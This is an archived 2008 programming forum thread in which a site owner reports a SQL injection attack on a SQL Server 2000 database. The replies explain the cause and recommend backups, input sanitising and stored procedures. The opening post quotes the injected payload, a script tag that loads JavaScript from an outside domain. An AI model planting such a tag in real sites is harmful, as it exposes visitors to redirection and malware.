Wrox Programmer Forums
|
SQL Server 2000 General discussion of Microsoft SQL Server -- for topics that don't fit in one of the more specific SQL Server forums. version 2000 only. There's a new forum for SQL Server 2005.
Welcome to the p2p.wrox.com Forums.

You are currently viewing the SQL Server 2000 section of the Wrox Programmer to Programmer discussions. This is a community of software programmers and website developers including Wrox book authors and readers. New member registration was closed in 2019. New posts were shut off and the site was archived into this static format as of October 1, 2020. If you require technical support for a Wrox book please contact http://hub.wiley.com
 
Old May 27th, 2008, 12:52 AM
Authorized User
  
Join Date: Jul 2007
Posts: 10
Thanks: 0
Thanked 0 Times in 0 Posts
Default My database was affected
Hai

My database is in SQL SERVER 2000. My site is written in asp language. It was working fine before. But Now there was some unexcepted script tags are added in my each and every record in my sql sever the sample of the tag is
<script src=http://www.adw95.com/b.js></script>.

Because of this problem my site didn't show some contents and automaticaly refreshing and going to unwanted weblinks.

Please Help me.

Why this problem came?
what is the solution of this problem?
How to prevent this problem?

Thanking You


 
Old May 27th, 2008, 12:59 AM
Imar's Avatar
Wrox Author
  
Join Date: Jun 2003
Posts: 17,089
Thanks: 80
Thanked 1,576 Times in 1,552 Posts
Default
Hi there,

Take a look here: http://p2p.wrox.com/topic.asp?TOPIC_ID=71382

>> Why this problem came?

Hackers got (some) control of your system and injected JavaScript in your database.

>> what is the solution of this problem?

Twofold: restore a backup of the database (or manually clean the data) and then protect yourself against SQL Injection.

>> How to prevent this problem?

Protect yourself against future attempts. Sanitize all incoming data before you process it.

http://www.ngssoftware.com/papers/ad..._injection.pdf

Cheers,

Imar

---------------------------------------
Imar Spaanjaars
http://Imar.Spaanjaars.Com
Everyone is unique, except for me.
Author of Beginning ASP.NET 3.5 : in C# and VB, ASP.NET 2.0 Instant Results and Dreamweaver MX 2004
Want to be my colleague? Then check out this post.
 
Old May 27th, 2008, 01:08 AM
Authorized User
  
Join Date: Jul 2007
Posts: 10
Thanks: 0
Thanked 0 Times in 0 Posts
Default
ok sir,

 Thanks for your reply.
 I will go through it
 
Old May 27th, 2008, 04:44 PM
Friend of Wrox
  
Join Date: Oct 2006
Posts: 475
Thanks: 0
Thanked 9 Times in 9 Posts
Default
Also, if you use stored procedures instead of SQL embedded in your app, it also becomes much more secure and without much effort.

--Jeff Moden





Similar Threads
Thread Thread Starter Forum Replies Last Post
Bulk Insert TSQL in DTS – Rows Affected Count sjm SQL Server DTS 2 May 30th, 2008 11:40 AM
Microsoft JET Database Database Engine (0x80040E09 cannielynn0312 Classic ASP Professional 2 December 17th, 2007 02:50 AM
Copying Table From one Database To Anoter Database jayanth_nadig VB Databases Basics 1 June 19th, 2006 02:39 PM
the UpdateCommand affected 0 of the expected 1 rec theRealAirness ADO.NET 0 March 28th, 2005 04:23 PM




Contact Us - Wrox - Privacy Statement - Top

Powered by vBulletin®
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
Copyright (c) 2020 John Wiley & Sons, Inc.